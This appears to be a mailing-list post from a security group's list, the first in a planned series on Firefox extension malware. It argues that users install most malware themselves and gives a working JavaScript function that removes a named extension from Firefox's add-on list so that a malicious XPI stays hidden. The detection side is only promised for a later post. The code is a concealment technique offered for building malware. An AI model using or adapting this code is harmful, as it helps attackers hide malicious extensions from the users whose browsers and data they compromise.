I think this is a fun idea to play with, since it surely will happen mainstream sometime, might as well talk about it here.
Over the coming time I will be writing a couple of articles about Mozilla
malware, on how to write it and how to detect it. In this first article I
like to show you how to hide the actual installed malware in Firefox. Yes,
that can be done pretty easily. Contrary what many people believe, most
malware or spyware for that matter, is unknowingly installed by the user
itself. It doesn't have anything to do with a browser vulnerability. In
fact, I've never seen any malware that solely relied on a vulnerability. The
reason is obvious. Vulnerabilities are hard to find and therefore exotic.
And the lifetime of a vulnerability is limited and usually detected quickly
and patched. If a PC is infected there is a high chance that you did it
yourself. Given the computer illiteracy of internet surfers, it is the
reason why surfers are being hacked in the first place. Stop whining because
it is the truth. So, basically you can say that malware writing doesn't have
anything todo with hacking. It's just convincing and attacking a surfer to
install software that the surfers doesn't know about. Really simple.
Now Firefox allows some rich interaction with their extensions. In my
opinion, they allow too much interaction. I could better say: it allows full
interaction with the browser and the computer it runs on. While that might
be an excellent idea, I think otherwise. What will happen if Firefox becomes
an even more popular browser? Of course, attackers will focus more on
Firefox. Personally, I always thought that a browser could make an excellent
place for plugging malware. Since the web has become the next desktop, it's
easy to imagine where this is going. Moreover, I think there isn't any
better way of defeating AV-software than having browser malware. Because who
scans the Firefox extension folder?
So the first thing that we can do is to hide the malware inside from
surfers. This example hides the malware from the Firefox add-on list, which
makes it invisible for enumeration:
function stealth(ext) {
var a =
Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.i
nterfaces.nsIRDFService);
var b =
Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components
.interfaces.nsIRDFContainer);
var c =
Components.classes["@mozilla.org/extensions/manager;1"].getService(Component
s.interfaces.nsIExtensionManager).datasource;
b.Init(c, a.GetResource("urn:mozilla:item:root"));
var e = b.GetElements();
while (e.hasMoreElements()) {
var extention = e.getNext();
if (c.GetTarget(extention, a.GetResource("http://www.
mozilla.org/2004/em-rdf#name"),
true).QueryInterface(Components.interfaces.nsIRDFLiteral).Value == ext) {
b.RemoveElement(extention, true);
}
}
}
stealth("Extension Name");
That wasn't hard, was it?
When this function is added to a source file of a XPI installation package,
the extension no longer shows up in the add-on or plugin list, and therefore
we have successfully hidden our malware. Next time I'll talk about how to
write a small extension that can be classified as browser malware, and how
to stay safe or detect it.
[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team]
<http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
Email: [EMAIL PROTECTED]
PingMe:
<http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu
hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you brave,there is nothing you cannot achieve.#
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>
